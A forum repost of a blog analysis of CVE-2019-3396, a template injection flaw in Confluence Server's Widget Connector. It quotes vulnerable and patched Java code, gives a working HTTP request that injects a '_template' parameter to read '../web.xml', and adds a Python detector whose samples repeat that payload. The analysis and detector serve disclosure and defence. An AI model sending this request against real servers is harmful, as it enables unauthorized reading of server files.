Nytro Posted April 7, 2019

[CVE-2019-3396]: SSTI and RCE in Confluence Server via Widget Connector

Published 2019-04-06 | Category: Web Security | Views: 1141
Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Analysis

According to the document, there are three parameters that you can set to control the content or format of the macro output: URL, Width and Height.

The Widget Connector has defined some renderers, for example the FriendFeedRenderer:

    public class FriendFeedRenderer implements WidgetRenderer {
        ...
        public String getEmbeddedHtml(String url, Map<String, String> params) {
            // this renderer sets the Velocity template itself before rendering
            params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
            return this.velocityRenderService.render(getEmbedUrl(url), params);
        }
    }

In FriendFeedRenderer's getEmbeddedHtml function, you will see they put another option, _template, into the params map. However, some other renderers, such as those in the video category, just call render(getEmbedUrl(url), params) directly. So in this situation, we can "offer" the _template ourselves, and the backend will use the params to render.

Reproduce

    POST /rest/tinymce/1/macro/preview HTTP/1.1

    {"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

Patch

In the fixed version, it will call doSanitizeParameters before rendering the HTML, which will remove _template from the parameters. The code may look like this:

    public class WidgetMacro extends BaseMacro implements Macro, EditorImagePlaceholder {
        public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory) {
            ...
            // parameter names that must never come from user input
            this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
        }
        ...
        public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
            ...
            doSanitizeParameters(parameters);
            return this.renderManager.getEmbeddedHtml(url, parameters);
        }

        private void doSanitizeParameters(Map<String, String> parameters) {
            Objects.requireNonNull(parameters);
            for (String sanitizedParameter : this.sanitizeFields) {
                parameters.remove(sanitizedParameter);
            }
        }
    }

Source: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
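As an added example (not code from the post or from Atlassian), the Python below shows the defender's side of the analysis above: the same strip-reserved-keys step the patch performs, plus a check that flags macro-preview requests whose widget macro carries a renderer-internal parameter such as _template, or any parameter outside the three documented ones. The sample requests are constructed, not real traffic.

```python
import json

# Documented Widget Connector parameters named in the post: URL, Width, Height.
ALLOWED_WIDGET_PARAMS = {"url", "width", "height"}
# The key the fix removes (its sanitizeFields list).
RESERVED_PARAMS = {"_template"}
PREVIEW_PATH = "/rest/tinymce/1/macro/preview"


def sanitize_widget_params(params):
    """Mirror of the patch: drop reserved keys before params reach a renderer.
    Returns a new dict so the caller's input is not mutated."""
    return {k: v for k, v in params.items() if k not in RESERVED_PARAMS}


def inspect_preview_request(path, body):
    """Return findings (list of strings) for one request; empty means clean.
    body is the raw JSON request body as a string."""
    if path != PREVIEW_PATH:
        return []
    try:
        req = json.loads(body)
    except ValueError:
        return ["unparseable JSON body"]
    macro = req.get("macro") or {}
    if macro.get("name") != "widget":
        return []
    findings = []
    for key in (macro.get("params") or {}):
        if key in RESERVED_PARAMS:
            findings.append(f"reserved renderer parameter supplied: {key}")
        elif key not in ALLOWED_WIDGET_PARAMS:
            findings.append(f"undocumented widget parameter: {key}")
    return findings


# Constructed (path, body) pairs: a normal preview, one carrying _template,
# and one on an unrelated endpoint.
SAMPLE_REQUESTS = [
    (PREVIEW_PATH, '{"contentId":"1","macro":{"name":"widget","params":{"url":"https://example.invalid/v/1","width":"400","height":"300"},"body":""}}'),
    (PREVIEW_PATH, '{"contentId":"1","macro":{"name":"widget","params":{"url":"https://example.invalid/v/1","_template":"../web.xml"},"body":""}}'),
    ("/rest/api/content", '{"macro":{"name":"widget","params":{"_template":"x"}}}'),
]


def scan(requests):
    """Map request index -> findings, for requests that produced any."""
    result = {}
    for i, (path, body) in enumerate(requests):
        findings = inspect_preview_request(path, body)
        if findings:
            result[i] = findings
    return result


if __name__ == "__main__":
    for i, f in scan(SAMPLE_REQUESTS).items():
        print(i, f)
```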